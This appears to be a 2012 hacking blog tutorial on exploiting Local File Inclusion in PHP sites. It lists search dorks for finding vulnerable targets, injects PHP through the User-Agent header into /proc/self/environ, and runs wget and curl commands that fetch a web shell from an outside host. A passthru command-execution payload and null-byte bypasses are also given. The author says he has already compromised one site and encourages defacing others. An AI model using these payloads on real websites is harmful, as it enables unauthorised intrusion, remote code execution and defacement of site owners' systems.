Thursday, August 30, 2012

LFI and Shell Upload with Tamper Data

Share this article :

Hello Friends, today I'm Publishing a tutorial on what is LFI , and how to Upload Shell with Tamper Data in LFI and vulnrable website

LFI means Local File Inclusion, its gives you access to read files on a website/server via your  browser.
previously i Published a Post on LFI, you can read it here 






LFI  vulnerable website URL looks  like this:
Code:
www.website.com/index.php?page=/etc/passwd


Here's what the code looks like that makes it vulnerable.

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
  include("pages/$file");
   }
   else
   {
  include("index.php");
   }
   ?>
Few Things You Need for this Method


1. FireFox [download]
2. Tamper Data [download]
3. Vulnerable Sites [Get it here]



or use these dorks for finding vulnrable websites
inurl:index.php?homepage=
inurl:index.php?page=
inurl:index.php?index2=

Now i'm showing  how to exploit LFI and upload your shell via /proc/self/environ using Tamper data


So after selecting a vulnrable website, check /etc/passwd.
Your page should come up with something that looks like this.



 image_2317891.original.jpg (620×511)
 Full size Image : click here
Great !!, now you are sure  that website is vulnerable.
Now check for /proc/self/environ
So change your path to /proc/self/environ


Your page will look  like this if the file exists,
Note - not all websites have it.
image_2317892.original.jpg (620×383) 


Full size image : Click here

i'm interested in,  HTTP_USER_AGENT. now i'm going to change our user agent to try and get data from the site by injecting code where our browsers user agent should be.


To do this, i am going to use tamperdata. Once you have it installed, go to your options, and go to TamperData.

 image_2317897.original.jpg (264×306)


Now you will got a  window looks like this.
image_2317896.original.jpg (478×620) 



your page Must still be /proc/self/environ
Click Start Tamper, and refresh your page.


 i'll try some code injection.
After start tampering, you should see a window  looks  like this


image_2317893.original.jpg (620×260) 
Full size image : Click Here



In the User-Agent field, type this 


<?php phpinfo();?>


Now vulnrable website is down loading, 
you will see something like this if you did it correctly
image_2317894.original.jpg (620×453) 
Full size Image : click here

Now we can execute code, so let's upload upload your shell 


Open TamperData again, click start tamper, and refresh  website. and This time in the User-Agent enter this


<?exec('wget http://www.site.com/shell.txt -O shell.php');?>


It will look like this
image_2317898.original.jpg (620×262) 
Full size image : Click here

it downloads  text file, and renames it as a php file 
You can upload your shell as a text file using free webhosting...
I already shelled a website, so I am going to use that website as file hosting


when you're done with that, you can access your shell directly by going to http://site/shell.php


If you getting an error, try using the same method as when you got your 
http://www.site.com/index.php?page=/etc/passwd
upload your shell by using the same method.
http://www.site.com/index.php?page=shell.php


If it loads fine the second time, you can upload a your deface using shell... checkout best deface pages here
When you are done, you have a  shell, like this <3
image_2317895.original.jpg (620×334) 
Full size Image : Click Here

Alternate Method :
Some websites having extra precaution to prevent attacks like these.
so use this alternate method.


Change your user agent to:


<? passthru($_GET['cmd']); ?>


Now load website as
/proc/self/environ?cmd=curl http://www.site.com/shell.txt -o shell.php
 your url should look like
http://www.vulnerablesite.com/index.php?page=/proc/self/environ?cmd=curlhttp://www.yoursite.com/shell.txt -o shell.php


Now hopefully your shell uploaded.


Null Bytes


Adding a , or a nullbyte sometimes filters the site, and you can get around the firewalls.
http://www.site.com/index.php?page=/etc/passwd
Facebook Comments Plugin by Master cMs>

Do you like this post? Please link back to this article by copying one of the codes below.

URL Of Post:


HTML Link Code:

BB (forum) link code:

0 comments:

Post a Comment

 

Sponsor

To Top Page Up Page Down To Bottom Auto Scroll Stop Scroll